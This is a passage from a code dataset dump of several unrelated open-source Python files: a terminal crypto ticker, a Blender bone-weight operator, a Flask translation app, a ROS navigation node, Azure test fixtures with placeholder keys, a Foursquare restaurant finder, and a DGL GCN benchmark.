sys.argv[2:]\n else:\n syms = sys.argv[1:]\n if AUTO_FILL: # ... till MAX_FILL (or MAX_HEIGHT)\n num = 0\n #\n ranked = []\n num_skipped = 0\n # Need to preserve order, so can't use set union here\n for sym in reversed(syms):\n try:\n symbol = await client.canonicalize_pair(sym)\n except ValueError as e:\n # Could use ``warnings.warn`` for stuff like this\n msg += [\"%r not found, removing...\" % sym]\n if AUTO_FILL:\n num_skipped += 1\n else:\n if symbol not in ranked:\n ranked.append(symbol)\n #\n if len(ranked) > MAX_HEIGHT:\n msg += [\"Too many pairs requested for current terminal height. \"\n \"Over by %d.\" % (len(ranked) - MAX_HEIGHT)]\n if not AUTO_CULL:\n raise ValueError(msg)\n culled = ranked[-1 * (len(ranked) - MAX_HEIGHT):]\n ranked = ranked[:-1 * len(culled)]\n msg += [\"\\nAUTO_CULL is on; dropping the following: \"\n + \", \".join(culled).rstrip(\", \")]\n #\n if num == 0:\n num = min(MAX_FILL, MAX_HEIGHT) - len(ranked)\n elif num is not None:\n if num + len(ranked) > MAX_HEIGHT:\n num = MAX_HEIGHT - len(ranked)\n msg += [\"Too many NUM leaders requested for current terminal \"\n \"height; reducing to %d\" % num]\n elif num_skipped:\n num = min(num + num_skipped, MAX_HEIGHT - len(ranked))\n #\n if msg:\n if LOGFILE:\n client.echo(\"\\n\".join(msg))\n else:\n print(*msg, sep=\"\\n\", file=sys.stderr)\n from time import sleep\n sleep(1)\n #\n if not AUTO_FILL or not num: # <- num might have been decremented to 0\n return ranked\n assert len(ranked) + num <= MAX_HEIGHT\n #\n # If VOL_SORTED is False, named pairs will be appear above ranked ones\n for symbol in await client.get_volume_leaders():\n if symbol not in ranked:\n ranked.append(symbol)\n num -= 1\n if num < 1:\n break\n return ranked\n\n\nasync def main(loop, Client):\n async with Client(VERBOSITY, LOGFILE, USE_AIOHTTP) as client:\n #\n ranked_syms = await choose_pairs(client)\n #\n rt_fut = do_run_ticker(ranked_syms, client, loop)\n return await rt_fut\n\n\ndef main_entry():\n global HAS_24, LOGFILE, PULSE, PULSE_OVER, HEADING, MAX_HEIGHT, \\\n STRICT_TIME, VERBOSITY, VOL_SORTED, VOL_UNIT, USE_AIOHTTP, \\\n AUTO_FILL, AUTO_CULL, EXCHANGE, MAX_FILL\n #\n if sys.platform != 'linux':\n raise SystemExit(\"Sorry, but this probably only works on Linux\")\n if sys.version_info < (3, 6):\n raise SystemExit(\"Sorry, but this thing needs Python 3.6+\")\n #\n if len(sys.argv) > 1 and sys.argv[1] in (\"--help\", \"-h\"):\n print(__doc__.partition(\"\\nWarn\")[0].partition(\"::\\n\")[-1])\n with open(__file__) as f:\n hunks = f.read().split(\"\\n\\n\")\n lines = [p for p in hunks if\n p.startswith(\"# Env vars\")].pop().split(\"\\n\")[1:]\n from ast import literal_eval\n fmt = \"{:<4}{:<12}{:<8}{:<9}{}\"\n for line in lines:\n name, rest = line.split(\"=\")\n val, doc = rest.split(\"#\")\n typ = \"<%s>\" % type(literal_eval(val.strip())).__name__\n val = (\"%s\" % val.strip('\" ').replace(\"True\", \"1\")\n .replace(\"False\", \"0\").replace(\"None\", \"''\"))\n print(fmt.format(\"\", name.strip(), typ, val, doc.strip()))\n sys.exit()\n #\n VERBOSITY = int(os.getenv(\"VERBOSITY\", VERBOSITY))\n USE_AIOHTTP = any(s == os.getenv(\"USE_AIOHTTP\", str(USE_AIOHTTP)).lower()\n for s in \"yes true 1\".split())\n HAS_24 = (\n any(s == os.getenv(\"COLORTERM\", \"\") for s in (\"24bit\", \"truecolor\")) or\n any(s == os.getenv(\"HAS_24\", str(HAS_24)).lower() for\n s in \"24bit truecolor yes on true 1\".split())\n )\n STRICT_TIME = any(s == os.getenv(\"STRICT_TIME\", str(STRICT_TIME)).lower()\n for s in \"yes on true 1\".split())\n PULSE = os.getenv(\"PULSE\", PULSE)\n if PULSE.lower() in \"0 off false no null none\".split():\n PULSE = None\n PULSE_OVER = float(os.getenv(\"PULSE_OVER\", PULSE_OVER))\n _heading = os.getenv(\"HEADING\", HEADING)\n HEADING = (_heading if _heading in Headings.__members__ else HEADING)\n MAX_HEIGHT = os.get_terminal_size().lines - Headings[HEADING].value\n VOL_SORTED = any(s == os.getenv(\"VOL_SORTED\", str(VOL_SORTED)).lower()\n for s in \"yes on true 1\".split())\n VOL_UNIT = os.getenv(\"VOL_UNIT\", VOL_UNIT)\n if VOL_UNIT.lower() in (\"\", \"null\", \"none\"):\n VOL_UNIT = None\n else:\n VOL_UNIT = VOL_UNIT.upper()\n AUTO_FILL = any(s == os.getenv(\"AUTO_FILL\", str(AUTO_FILL)).lower()\n for s in \"yes on true 1\".split())\n AUTO_CULL = any(s == os.getenv(\"AUTO_CULL\", str(AUTO_CULL)).lower()\n for s in \"yes on true 1\".split())\n MAX_FILL = os.getenv(\"MAX_FILL\", str(MAX_FILL))\n if MAX_FILL.isdigit():\n MAX_FILL = int(MAX_FILL)\n else:\n MAX_FILL = MAX_HEIGHT\n #\n loop = asyncio.get_event_loop()\n add_async_sig_handlers(\"SIGINT SIGTERM\".split(), loop=loop)\n #\n LOGFILE = os.getenv(\"LOGFILE\", None)\n #\n # XXX should probably print message saying exchange not yet supported\n EXCHANGE = os.getenv(\"EXCHANGE\", EXCHANGE).lower()\n if EXCHANGE == \"binance\":\n Client = binance.BinanceClient\n else:\n Client = hitbtc.HitBTCClient\n #\n # Since this doesn't use curses, shell out to get cursor vis\n # escape sequences, if supported (absent in ansi and vt100).\n civis = cnorm = \"\"\n from subprocess import check_output\n try:\n civis = check_output([\"tput\", \"civis\"]).decode()\n cnorm = check_output([\"tput\", \"cnorm\"]).decode()\n except FileNotFoundError:\n pass\n else:\n print(civis, end=\"\", flush=True)\n #\n try:\n if LOGFILE and os.path.exists(LOGFILE):\n from contextlib import redirect_stderr\n with open(os.getenv(\"LOGFILE\"), \"w\") as LOGFILE:\n with redirect_stderr(LOGFILE):\n ppj(loop.run_until_complete(main(loop, Client)),\n file=LOGFILE)\n else:\n VERBOSITY = 3\n results = loop.run_until_complete(main(loop, Client))\n for item in (results, results.get(\"gathered\", {}),\n results.get(\"subs\", {})):\n try:\n print(\"\", item[\"error\"], sep=\"\\n\", file=sys.stderr)\n except (TypeError, KeyError):\n pass\n # XXX not sure why this was ever added\n except RuntimeError as e:\n if \"loop stopped before Future completed\" not in str(e):\n raise\n elif LOGFILE:\n print(e, file=LOGFILE)\n finally:\n print(cnorm, \"\\x1b[K\")\n\n\nif __name__ == \"__main__\":\n sys.exit(main_entry())\n\n# Copyright 2017 Jane Soko <boynamedjane@misled.ml>\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n","repo_name":"poppyschmo/terminal-coin-ticker","sub_path":"terminal_coin_ticker/ticker.py","file_name":"ticker.py","file_ext":"py","file_size_in_byte":30746,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"2188771070","text":"import bpy\nimport bmesh\nfrom .check_weights import SHKI_OT_CheckWeights\nfrom bmesh.types import BMVert\n\ndef list_vertex_groups_all(self, context):\n return [(str(i), g.name, \"Group\") for i, g in enumerate(context.edit_object.vertex_groups)]\n\ndef list_vertex_groups_selected(self, context):\n selected_groups = set()\n\n obj = bpy.context.edit_object\n bm = bmesh.from_edit_mesh(obj.data)\n verts = [v for v in bm.verts if v.select and not v.hide]\n\n for g in obj.vertex_groups:\n for v in verts:\n try:\n g.weight(v.index)\n selected_groups.add(g)\n break\n except:\n pass # move along\n\n return [(str(i), g.name, \"Group\") for i, g in enumerate(context.edit_object.vertex_groups) if g in selected_groups]\n\n\nclass SHKI_OT_ReplaceBone(bpy.types.Operator):\n \"\"\"Move verts from one group to another with the same weights\"\"\"\n bl_idname = \"shurushki.replace_bone\"\n bl_label = \"Replace Bone\"\n\n\n p_from: bpy.props.EnumProperty(name=\"From\", items=list_vertex_groups_selected, description=\"Bone that is replaced\")\n p_to: bpy.props.EnumProperty(name=\"To\", items=list_vertex_groups_all, description=\"Bone that replaces\") # ahem\n\n\n @classmethod\n def poll(cls, context):\n if context.mode != 'EDIT_MESH':\n return False\n\n obj = context.edit_object\n return obj is not None and obj.data is not None\n\n\n def execute(self, context):\n obj = bpy.context.edit_object\n bm = bmesh.from_edit_mesh(obj.data)\n verts = [v for v in bm.verts if v.select and not v.hide]\n weights = bm.verts.layers.deform.active\n\n i_from = int(self.p_from)\n i_to = int(self.p_to)\n\n changed = 0\n \n for v in verts:\n if i_from in v[weights]:\n changed += 1\n v[weights][i_to] = v[weights][i_from]\n del v[weights][i_from]\n \n # apply changes\n bmesh.update_edit_mesh(obj.data)\n\n self.report({'INFO'}, f\"Changed {changed} verts\")\n\n return {'FINISHED'}\n \n\n def invoke(self, context, event):\n if list_vertex_groups_selected(self, context):\n wm = context.window_manager\n return wm.invoke_props_dialog(self)\n \n self.report({'INFO'}, f\"Verts aren't attached to a bone\")\n return {'CANCELLED'}","repo_name":"lampysprites/shurushki-blender-scripts","sub_path":"replace_bone.py","file_name":"replace_bone.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"582332658","text":"import json\r\nfile = open(\"data.txt\",mode = \"r\", encoding = \"utf-8\")\r\ndata = json.load(file)\r\nfile.close()\r\n\r\n#flask\r\nfrom flask import * #载入flask\r\napp = Flask(\"My Website\") #建立一个网站应用程序物件\r\n#网址网站http:/主机名称/路径?参数名称=资料&参数名称=资料&...\r\n#https://minwen.herokuapp.com/\r\n@app.route(\"/\") #指定对应网址路径\r\ndef home(): #对应的处理函式\r\n return render_template(\"home.html\") #回应给前端的信息\r\n\r\n#eg:https://minwen.herokuapp.com/test.php?keyword=关键字\r\n@app.route(\"/test.php\") #指定对应网址路径\r\ndef test(): #对应的处理函式\r\n #取得网址列上参数:request.args.get(\"参数名称\". 预设值)\r\n keyword = request.args.get(\"keyword\", None)\r\n if keyword == None:\r\n return redirect(\"/\")\r\n else:\r\n if keyword in data:\r\n return render_template(\"result.html\",result = data[keyword])\r\n else:\r\n return render_template(\"result.html\",result = \"没有翻译\")\r\nif __name__==\"__main__\": #如果以主程式执行,立即启动服务器\r\n app.run() #启动服务器 #ctrl+c--暂停\r\n","repo_name":"minwen0226/LINEROT","sub_path":"HIIII/wie.py","file_name":"wie.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17880307588","text":"#!/usr/bin/env python\n\n\"\"\"\n.. module:: go_to_desired_pos\n :platform: Unix\n :synopsis: Python node for robot's autonomous driving capapilities.\n\n.. moduleauthor:: Fabio Conti <s4693053@studenti.unige.it>\n\nSubscribes to:\n /nav_msgs/odometry topic where the simulator publishes the robot position.\n\nAction:\n MoveBaseAction\n MoveBaseGoal\n \n\nThis node implements the autonomous driving capability. The script exploits an *action client* (*actionlib* library) instance to establish direct communication with the mobile robot and set and cancel location goals.\n\nThe Action Client-Service communicate via a \"ROS Action Protocol\", which is built on top of ROS messages. The client and server then provide a simple API for users to request goals (on the client side) or to execute goals (on the server side) via function calls and callbacks. \nThrough out the coding of this node I implemented only the *Actionclient* side of the whole structure using the already existing server of the following action messages:\n\n* ``MoveBaseAction``\n* ``MoveBaseGoal``\n\nFor the client and server to communicate, I should define a few messages on which they communicate. This defines the Goal, Feedback, and Result messages with which clients and servers communicate. throughout the coding, I only used the Goal message because that was the one message needed for fulfilling the project aim. \n\nThanks to the Actionlib feature, an ActionServer receives the goal message from an ActionClient. In the case of my project, the goal is to move the robot's base position. The goal would be a MoveBaseGoal message that contains information about where the robot should move to in the world. For controlling all the robot positions in space, the goal would contain the *target_pose* parameters (stamp, orientation, target position, etc).\n\n\"\"\"\n\n# libraries imports \nimport actionlib\nfrom move_base_msgs.msg import MoveBaseAction, MoveBaseGoal\nfrom geometry_msgs.msg import Twist, Point\nfrom nav_msgs.msg import Odometry\nfrom tf import transformations\nfrom std_srvs.srv import *\nimport time\nimport math\nimport rospy\n\n\nst=\" \"\n\nflag_goal = 0\n\"\"\"\nGlobal variable for defining the current node state.\n\"\"\"\n\n\ndef update_variables(): \n\t\"\"\"\n\tFunction that will costantly update the just mentioned paramiters and assign them to their global variable.\n\t\n\tNo Args \n\t\n\tNo Returns\n\t\"\"\"\n\tglobal desired_position_x, desired_position_y, active_\n\tactive_ = rospy.get_param('active')\n\tdesired_position_x = rospy.get_param('des_pos_x')\n\tdesired_position_y = rospy.get_param('des_pos_y')\n\n\ndef clbk_odom(msg): \n\t\"\"\"\n\tCallBack to the odometry topic that will be needed to retrive the current x/y position of the robot in the enviroment.\n\tThe information about the odometry position of the robot is assigned to the global `position_` variable. \n\tArgs:\n\t msg (/odom.msg): this variable will contain the current x/y position of the robot in the enviroment.\n\t \n\t No Returns\n\t\"\"\"\n\n\tglobal position_\n\tposition_ = msg.pose.pose.position\n\t\n\ndef done_cb(status,result):\n\t\"\"\"\n\tCallBack function for retriving information about the status of the robot once the goal position is reached.\n\tOnce the holonomic robot will reach the goal, the flag_goal variable will change value to 1. This change will set the modality in the **idle state**.\n\n\tArgs:\n\t status (actionlib_goalStatus): integer code corrisponding to the terminal state.\n\t result (MoveBaseResult): result of the goal processing.\n\t \n\tNo Returns\n\t\"\"\"\n\tglobal flag_goal\n\t\n\tif status==3:\n\t\tprint(\"\\033[1;34;40m goal achived!\"+st+\"\\033[0;37;40m \\n\")\n\t\tflag_goal = 1\n\t\n\ndef action_client_set_goal():\n\t\"\"\"\n\tFunction for setting a new goal through the use of the action client.\n\tThe `send_goal` function will activate the reaching of the robot's target keeping track of the action throgh the callback *done_cb*. \n\t\n\tNo Args \n\t\n\tNo returns\n\t\"\"\"\n\n\tgoal.target_pose.pose.position.x = desired_position_x\n\tgoal.target_pose.pose.position.y = desired_position_y\n\tprint(\"\\033[1;33;40m START AUTONOMOUS DRIVE\"+st+\"\\033[0;37;40m \\n\")\n\tclient.send_goal(goal,done_cb)\n\n\ndef action_client_init():\n\t\"\"\"\n\tFunction for the initialization of the action client and the goal message that will be sent to the action server through the clinet.\n\tThe goal message is of the type ``MoveBaseGoal``. This type of message will contaoin allthe information about the way the robot will reach the set target. \n\tIn this function only some general goal info are set.\n\t\n\tNo Args\n\t\n\tNo returns\n\t\"\"\"\n\n\tglobal client \n\tglobal goal \n\t\n\tclient = actionlib.SimpleActionClient('move_base',MoveBaseAction) # Initialization of the action client.\n\tclient.wait_for_server()\t\t\t\t\t\t\t# Waiting for the server to get ready.\n\t\n\tgoal = MoveBaseGoal() \t\t\t\t\t\t# Initialization of the goal message.\n\tgoal.target_pose.header.frame_id = \"map\"\t\t# Setting up some parameters of the goal message.\n\tgoal.target_pose.header.stamp = rospy.Time.now()\n\tgoal.target_pose.pose.orientation.w = 1.0\n\t\ndef my_callback_timeout(event):\n\t\"\"\"\n\tCallBack function used for setting up a timeout to the robot's current task.\n\tThis function will be activated only if the robot doesn't reach the the desired position target within a 1min time span.\n\tThe global parameter `active` will be set again to 0 resetting the status of the whole controller structure.\n\n\tArgs:\n\t event (float) : time variable. \n\t\n\tNo Returns\n\t\"\"\"\n\n\tif active_==1:\n\t\tprint (\"\\033[1;31;40m Goal time expired\\033[0;37;40m :\" + str(event.current_real)+st)\n\t\tprint(\"The robot didn't reach the desired position target within a 1min time span\\n\")\n\t\trospy.set_param('active', 0)\n\t\t\n\ndef main():\n\t\"\"\"\n\tFunction for managing the state of the robot. \n\tAfter the initialization of the node and the assigning of the subscriber callback the the main while loop will start spinning. through out this loop the node will call the previously mentioned functions according to the current state set by the user through the global parameters. Also some messages will be printed to the shell during execution.\n\t\n\tNo returns\n\t\"\"\"\n\t\n\tactive_ = rospy.get_param('active')\n\t\"\"\"\n\tParameter retrived for keeping track of the current driving modality.\n\t\"\"\"\n\tdesired_position_x = rospy.get_param('des_pos_x')\n\t\"\"\"\n\tParameter retrived for assigning the x coodinate of the goal location.\n\t\"\"\"\n\tdesired_position_y = rospy.get_param('des_pos_y')\n\t\"\"\"\n\tParameter retrived for assigning the y coodinate of the goal location.\n\t\"\"\"\n\t\n\tglobal flag_goal\n\trospy.init_node('go_to_desired_pos')\t\t\t\t#initialization of the node.\n\tsub_odom = rospy.Subscriber('/odom', Odometry, clbk_odom)\t# Subscription to the odometry callback.\n\trate = rospy.Rate(10)\t\t\t\t\t\t\t# Time of the loop's sleeping rate.\n\tflag = 0\t\t\t\t\t\t\t\t\t# Flags needed for keeping track of the current state of the driving modalities.\n\tflag_2 = 0\n\t\n\taction_client_init()\t\t# Initialization of the action client.\n\t\n\ti = 0\t\t\t\t\t# Variable used to print on screen the current position\n\twhile(1):\n\t\n\t\tupdate_variables()\t# Variables update at every loop cycle.\n\t\t\n\t\t# If the active_ paramter is set by the user to 1, the node will get to the active state.\n\t\tif active_==1:\n\t\t\t\n\t\t\tif flag == 1:\n\t\t\t\taction_client_set_goal()\t\t\t\t\t# The new goal position will be set.\n\t\t\t\trospy.Timer(rospy.Duration(60),my_callback_timeout) \t# The time out will start. \n\t\t\t\t\n\t\t\t\tflag = 0\n\t\t\t\tflag_2 = 1\n\t\t\t\n\t \n\t\telse:\n\t\t\t# Initial idle state \n\t\t\tif flag == 0 and flag_2==0:\n\t\t\t\t\n\t\t\t\tprint(\"\\033[1;31;40m STOP MODALITY 1 \\033[0;37;40m \\n\")\n\t\t\t\tflag = 1\n\t\t\t\n\t\t\t# Idle state the node will get to once the robot gets stopped by the user.\n\t\t\tif flag == 0 and flag_2==1:\n\t\t\t\t\n\t\t\t\t# Flag needed to know if the goal is reached or not\n\t\t\t\tif flag_goal==1:\n\t\t\t\t\t# If the goal is reached I will not cancel the goal because. \n\t\t\t\t\tprint(\"\\033[1;31;40m STOP MODALITY 1 \"+st+\"\\033[0;37;40m\")\n\t\t\t\t\tflag = 1\n\t\t\t\t\tflag_2 = 0\n\t\t\t\t\tflag_goal = 0\n\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# If the goal is not reached once the user switches modality or the time expires with the time-out.\n\t\t\t\t\tprint(\"\\033[1;31;40m GOAL CANCELED, STOP MODALITY 1 \"+st+\"\\033[0;37;40m\")\n\t\t\t\t\tclient.cancel_goal()\n\t\t\t\t\tflag = 1\n\t\t\t\t\tflag_2 = 0\n\t\t\t\t\n\t\t\n\t\t# Print of the current position\t\t\n\t\tif(i%10==0):\n\t\t\n\t\t\tprint(\"\\033[1;37;40m coordinates \\033[0;37;40m: \\033[1;33;40m X:\\033[0;37;40m \"+ str(position_.x)+\"\\033[1;33;40m Y: \\033[0;37;40m\" + str(position_.y), end = '\\r')\n\t\ti=i+1\n\t \t\t\n\trate.sleep()\n \n\nif __name__ == '__main__':\n\tmain()\n \n \n \n \n \n \n","repo_name":"Fabioconti99/RT1_Assignment_3","sub_path":"final_assignment/scripts/go_to_desired_pos.py","file_name":"go_to_desired_pos.py","file_ext":"py","file_size_in_byte":8462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3556913012","text":"\nimport os\nimport functools\nfrom devtools_testutils import PowerShellPreparer, AzureMgmtPreparer\nfrom azure.core.credentials import AzureKeyCredential\n\nENABLE_LOGGER = os.getenv('ENABLE_LOGGER', \"False\")\nREGION = os.getenv('FORMRECOGNIZER_LOCATION', None)\n\n\nFormRecognizerPreparer = functools.partial(\n PowerShellPreparer,\n 'formrecognizer',\n formrecognizer_test_endpoint=\"https://fakeendpoint.cognitiveservices.azure.com\",\n formrecognizer_test_api_key=\"fakeZmFrZV9hY29jdW50X2tleQ==\",\n formrecognizer_storage_container_sas_url=\"https://blob_sas_url\",\n formrecognizer_testing_data_container_sas_url=\"https://blob_sas_url\",\n formrecognizer_multipage_storage_container_sas_url=\"https://blob_sas_url\",\n formrecognizer_multipage_storage_container_sas_url_2=\"https://blob_sas_url\",\n formrecognizer_selection_mark_storage_container_sas_url=\"https://blob_sas_url\",\n formrecognizer_table_variable_rows_container_sas_url=\"https://blob_sas_url\",\n formrecognizer_table_fixed_rows_container_sas_url=\"https://blob_sas_url\",\n formrecognizer_storage_container_sas_url_v2=\"https://blob_sas_url\",\n formrecognizer_multipage_storage_container_sas_url_v2=\"https://blob_sas_url\",\n formrecognizer_multipage_storage_container_sas_url_2_v2=\"https://blob_sas_url\",\n formrecognizer_selection_mark_storage_container_sas_url_v2=\"https://blob_sas_url\",\n formrecognizer_table_variable_rows_container_sas_url_v2=\"https://blob_sas_url\",\n formrecognizer_table_fixed_rows_container_sas_url_v2=\"https://blob_sas_url\",\n formrecognizer_training_data_classifier=\"https://blob_sas_url\",\n formrecognizer_resource_id=\"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rgname/providers/Microsoft.CognitiveServices/accounts/formrecognizername\",\n formrecognizer_region=\"region\"\n)\n\n\nclass GlobalClientPreparer(AzureMgmtPreparer):\n def __init__(self, client_cls, client_kwargs={}, **kwargs):\n super(GlobalClientPreparer, self).__init__(\n name_prefix='',\n random_name_length=42\n )\n self.client_kwargs = client_kwargs\n self.client_cls = client_cls\n\n def create_resource(self, name, **kwargs):\n if self.is_live:\n form_recognizer_account = os.environ[\"FORMRECOGNIZER_TEST_ENDPOINT\"]\n form_recognizer_account_key = os.environ[\"FORMRECOGNIZER_TEST_API_KEY\"]\n polling_interval = 5\n else:\n form_recognizer_account = \"https://fakeendpoint.cognitiveservices.azure.com\"\n form_recognizer_account_key = \"fakeZmFrZV9hY29jdW50X2tleQ==\"\n polling_interval = 0\n\n client = self.client_cls(\n form_recognizer_account,\n AzureKeyCredential(form_recognizer_account_key),\n polling_interval=polling_interval,\n logging_enable=True if ENABLE_LOGGER == \"True\" else False,\n **self.client_kwargs\n )\n kwargs.update({\"client\": client})\n return kwargs\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/formrecognizer/azure-ai-formrecognizer/tests/preparers.py","file_name":"preparers.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"28021696427","text":"from geocode import getGeocodeLocation\nimport json\nimport httplib2\n\nimport sys\nimport codecs\n#sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n#sys.stderr = codecs.getwriter('utf8')(sys.stderr)\n\n# Use these once you register a FS developer app (another step after FS developer signup)\n#foursquare_client_id = \"PASTE_YOUR_ID_HERE\"\n#foursquare_client_secret = \"YOUR_SECRET_HERE\"\n\ndef findARestaurant(mealType,location):\n\t#1. Use getGeocodeLocation to get the latitude and longitude coordinates of the location string.\n\tlat, lng = getGeocodeLocation(location)\n\n\t#2. Use foursquare API to find a nearby restaurant with the latitude, longitude, and mealType strings.\n\t#HINT: format for url will be something like https://api.foursquare.com/v2/venues/search?client_id=CLIENT_ID&client_secret=CLIENT_SECRET&v=20130815&ll=40.7,-74&query=sushi\n\tfoursquare_token = \"TOKEN_ID\" \t# see example in FS docs, not to be used in production code\n\tfoursquare_v = \"V_ID\" \t\t\t\t\t# sample issued as YYYYMMDD date, not to be used in production code\n\tfoursquare_ll = \"%s,%s\" % (lat, lng)\n\tfoursquare_url = \"https://api.foursquare.com/v2/venues/explore?oauth_token=%s&v=%s&query=%s&ll=%s\" % (foursquare_token, foursquare_v, mealType, foursquare_ll)\n\th = httplib2.Http()\n\tresponse, body = h.request(foursquare_url, \"GET\")\n\tdata = json.loads(body)\n\t\n\tif not data['response']['groups']:\n\t\treturn None\n\n\t#3. Grab the first restaurant\n\trestaurant_name = data['response']['groups'][0]['items'][0]['venue']['name']\n\trestaurant_id = data['response']['groups'][0]['items'][0]['venue']['id']\n\t#4. Get a 300x300 picture of the restaurant using the venue_id (you can change this by altering the 300x300 value in the URL or replacing it with 'orginal' to get the original picture\n\timg_dimensions = (300, 300)\n\t\n\t# not stated in instructor comments but in quiz answer - format the address\n\taddress =\"\"\n\tfor line in data['response']['groups'][0]['items'][0]['venue']['location']['formattedAddress']:\n\t\taddress += \", %s\" % line\n\n\t#5. Grab the first image\n\ttry:\n\t\timg_url = \"https://api.foursquare.com/v2/venues/%s/photos?oauth_token=%s&v=%s\" % (restaurant_id, foursquare_token, foursquare_v)\n\t\timg_data = json.loads(h.request(img_url, \"GET\")[1]) \t# JSONify the body, returned at index 1\n\t\t# FS API\n\t\timg_src = img_data['response']['photos']['items'][0]['prefix'] + \"%sx%s\" % (img_dimensions[0], img_dimensions[1]) + img_data['response']['photos']['items'][0]['suffix']\n\t\n\t#6. If no image is available, insert default a image url\n\texcept:\n\t\timg_src = \"https://placebear.com/%s/%s\" % (img_dimensions[0], img_dimensions[1])\n\t\n\t#7. Return a dictionary containing the restaurant name, address, and image url\n\trestaurant = {'name': restaurant_name, 'id': restaurant_id, 'address': address, 'img': img_src}\n\tprint(restaurant)\n\treturn restaurant\n\nif __name__ == '__main__':\n\tfindARestaurant(\"Pizza\", \"Tokyo, Japan\")\n\tfindARestaurant(\"Tacos\", \"Jakarta, Indonesia\")\n\tfindARestaurant(\"Tapas\", \"Maputo, Mozambique\")\n\tfindARestaurant(\"Falafel\", \"Cairo, Egypt\")\n\tfindARestaurant(\"Spaghetti\", \"New Delhi, India\")\n\tfindARestaurant(\"Cappuccino\", \"Geneva, Switzerland\")\n\tfindARestaurant(\"Sushi\", \"Los Angeles, California\")\n\tfindARestaurant(\"Steak\", \"La Paz, Bolivia\")\n\tfindARestaurant(\"Gyros\", \"Sydney Australia\")","repo_name":"Botmasher/udacity-restful-apis","sub_path":"2-exercises/11-mashup/find_restaurant.py","file_name":"find_restaurant.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71586963681","text":"import dgl\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom dgl.nn.pytorch import GraphConv\n\nfrom .. import utils\n\n\nclass GCN(nn.Module):\n def __init__(\n self, in_feats, n_hidden, n_classes, n_layers, activation, dropout\n ):\n super(GCN, self).__init__()\n self.layers = nn.ModuleList()\n # input layer\n self.layers.append(GraphConv(in_feats, n_hidden, activation=activation))\n # hidden layers\n for i in range(n_layers - 1):\n self.layers.append(\n GraphConv(n_hidden, n_hidden, activation=activation)\n )\n # output layer\n self.layers.append(GraphConv(n_hidden, n_classes))\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, g, features):\n h = features\n for i, layer in enumerate(self.layers):\n if i != 0:\n h = self.dropout(h)\n h = layer(g, h)\n return h\n\n\ndef evaluate(model, g, features, labels, mask):\n model.eval()\n with torch.no_grad():\n logits = model(g, features)\n logits = logits[mask]\n labels = labels[mask]\n _, indices = torch.max(logits, dim=1)\n correct = torch.sum(indices == labels)\n return correct.item() * 1.0 / len(labels) * 100\n\n\n@utils.benchmark(\"acc\")\n@utils.parametrize(\"data\", [\"cora\", \"pubmed\"])\ndef track_acc(data):\n data = utils.process_data(data)\n device = utils.get_bench_device()\n\n g = data[0].to(device).int()\n\n features = g.ndata[\"feat\"]\n labels = g.ndata[\"label\"]\n train_mask = g.ndata[\"train_mask\"]\n val_mask = g.ndata[\"val_mask\"]\n test_mask = g.ndata[\"test_mask\"]\n\n in_feats = features.shape[1]\n n_classes = data.num_classes\n\n g = dgl.remove_self_loop(g)\n g = dgl.add_self_loop(g)\n\n # normalization\n degs = g.in_degrees().float()\n norm = torch.pow(degs, -0.5)\n norm[torch.isinf(norm)] = 0\n g.ndata[\"norm\"] = norm.unsqueeze(1)\n\n # create GCN model\n model = GCN(in_feats, 16, n_classes, 1, F.relu, 0.5)\n loss_fcn = torch.nn.CrossEntropyLoss()\n\n model = model.to(device)\n model.train()\n\n # optimizer\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-2, weight_decay=5e-4)\n for epoch in range(200):\n logits = model(g, features)\n loss = loss_fcn(logits[train_mask], labels[train_mask])\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n acc = evaluate(model, g, features, labels, test_mask)\n return acc\n","repo_name":"dmlc/dgl","sub_path":"benchmarks/benchmarks/model_acc/bench_gcn.py","file_name":"bench_gcn.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"73479270243","text":"from enum import Enum\nimport datetime\nimport glob\nimport json\nimport os\nimport sys\nimport zipfile\n\n#os.chdir(sys.path[0])\n\n# Cook vars\nmanifest_ext = '.amf'\nassets_root_dir = ''\ncooked_path = ''\n\nmanifests = []\nassets_in_manifests = []\nassets_not_on_fs = []\nassets_in_cooked = []\nassets_only_in_cooked = []\nassets_not_in_cooked = []\nassets_to_cook = []\n\nasset_type_map = {}\nasset_type_map['textures'] = 'Texture'\nasset_type_map['sounds'] = 'Sound'\nasset_type_map['fonts'] = 'Font'\nasset_type_map['texts'] = 'Text'\n\nclass Mode(Enum):\n\tAnalyse = 0\n\tCook = 1\n\nmode = Mode.Analyse\ncooked_exists = False\nbackup_path = ''\n\nclass Asset:\n\tdef __init__(self, _type, path, _id):\n\t\tself.type = _type\n\t\tself.path = path\n\t\tself.id = _id\n\t\tself.bytes = os.path.getsize(self.path)\n\tdef __eq__(self, other):\n\t\tif isinstance(other, Asset):\n\t\t\treturn self.id == other.id\n\tdef __hash__(self):\n\t\treturn hash(self.id)\n\nlog_str = ''\n\n# Utility\ndef 